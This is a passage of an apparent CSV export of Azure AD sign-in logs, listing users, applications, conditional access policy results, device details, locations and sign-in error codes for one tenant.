'235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",11779f6a-e330-484b-9e89-76d99a271f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,11779f6a-e330-484b-9e89-76d99a271f00,SigninLogs,Sucess,36.6404686,-78.26995087
+480,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+481,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:13.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,ff414ec2-7cd4-4ef7-a305-910ac40619d8,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",347323cf-0bf5-41ff-ba2a-4c4567931700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,347323cf-0bf5-41ff-ba2a-4c4567931700,SigninLogs,Failed,47.68061829,-122.1869888
+482,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:55.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,8f391060-6901-46e8-9a04-8e8deb5a0bf9,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e950640f-89f2-49b5-9956-82784edf1c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e950640f-89f2-49b5-9956-82784edf1c00,SigninLogs,Failed,50.6406517,5.572050095
+483,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:50.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f6b579d6-573b-4b6f-a072-c97e3d051500,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f6b579d6-573b-4b6f-a072-c97e3d051500,SigninLogs,Sucess,51.4458313,-0.969720006
+484,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:26.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,28118dbd-6829-4bba-802c-bdb4be93417f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",581df607-a3b5-4d26-ad1e-df5222e51c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,581df607-a3b5-4d26-ad1e-df5222e51c00,SigninLogs,Sucess,36.6404686,-78.26995087
+485,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:19.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,060f9a2b-b36a-4844-92d1-57916fd29cd8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ed279ba5-6389-4198-91ad-627e0f191c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ed279ba5-6389-4198-91ad-627e0f191c00,SigninLogs,Sucess,33.7984581,-84.38828278
+486,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e6a1aeb-0e3f-41f0-ac27-46737a9d6b4f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e6f8d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,62115b57-0cb2-458e-8ba0-179e6f8d1a00,SigninLogs,Sucess,33.7984581,-84.38828278
+487,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,df2414e9-c1e8-4460-9c84-e01faf14638f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, 